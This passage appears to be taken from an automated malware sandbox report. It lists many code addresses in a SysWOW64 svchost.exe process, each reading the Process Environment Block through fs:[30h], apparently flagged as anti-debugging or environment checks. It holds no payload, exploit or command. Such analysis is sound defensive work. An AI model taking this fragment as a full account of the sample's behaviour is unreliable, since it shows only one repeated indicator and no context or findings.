Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]	2_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]	2_2_036F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]	2_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]	2_2_0366A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]	2_2_03662674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]	2_2_0364C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]	2_2_0364E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]	2_2_03666620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]	2_2_03668620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]	2_2_0363262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]	2_2_036AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]	2_2_0364260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]	2_2_03672619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_036AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]	2_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]	2_2_036B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0366A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0366C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]	2_2_036666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]	2_2_03634690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]	2_2_03634690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]	2_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]	2_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]	2_2_0366656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]	2_2_03638550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]	2_2_03638550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]	2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]	2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]	2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]	2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]	2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]	2_2_0365E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]	2_2_036C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]	2_2_03704500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0365E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]	2_2_036325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]	2_2_0366C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]	2_2_0366C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]	2_2_0366E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]	2_2_0366E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]	2_2_036365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0366A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]	2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]	2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]	2_2_036B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]	2_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]	2_2_036545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]	2_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]	2_2_03632582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]	2_2_03664588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]	2_2_0366E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]	2_2_036BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]	2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]	2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]	2_2_0365A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]	2_2_0366E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]	2_2_036EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]	2_2_0362645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]	2_2_0365245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]	2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]	2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]	2_2_0362E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]	2_2_0362C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]	2_2_036B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]	2_2_0366A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]	2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]	2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]	2_2_03668402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]	2_2_036304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]	2_2_036364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]	2_2_036644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_036BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]	2_2_036EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]	2_2_0362CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]	2_2_036E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]	2_2_036E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]	2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]	2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]	2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]	2_2_03702B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]	2_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]	2_2_036C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]	2_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]	2_2_036D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]	2_2_03628B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]	2_2_036DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]	2_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]	2_2_0365EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]	2_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]	2_2_036F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]	2_2_03704B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]	2_2_036AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]	2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]	2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]	2_2_03638BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]	2_2_0365EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_036BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]	2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]	2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]	2_2_03650BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]	2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]	2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]	2_2_03630BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_036DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]	2_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h]	2_2_03640BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_036E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_036E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]	2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]	2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h]	2_2_0366CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h]	2_2_036DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]	2_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h]	2_2_036ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h]	2_2_03636A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]	2_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h]	2_2_03640A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h]	2_2_0366CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h]	2_2_0365EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]	2_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h]	2_2_03654A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h]	2_2_0366CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h]	2_2_036BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]	2_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h]	2_2_0366AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]	2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]	2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h]	2_2_03686ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h]	2_2_03630AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]	2_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h]	2_2_03664AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]	2_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h]	2_2_03638AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h]	2_2_03686AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h]	2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h]	2_2_03704A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h]	2_2_03668A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h]	2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]	2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367096E mov edx, dword ptr fs:[00000030h]	2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h]	2_2_0367096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]	2_2_036D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h]	2_2_036D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h]	2_2_036BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h]	2_2_036B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03704940 mov eax, dword ptr fs:[00000030h]	2_2_03704940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B892A mov eax, dword ptr fs:[00000030h]	2_2_036B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C892B mov eax, dword ptr fs:[00000030h]	2_2_036C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]	2_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h]	2_2_036AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h]	2_2_036BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]	2_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h]	2_2_03628918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_036BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]	2_2_036629F9
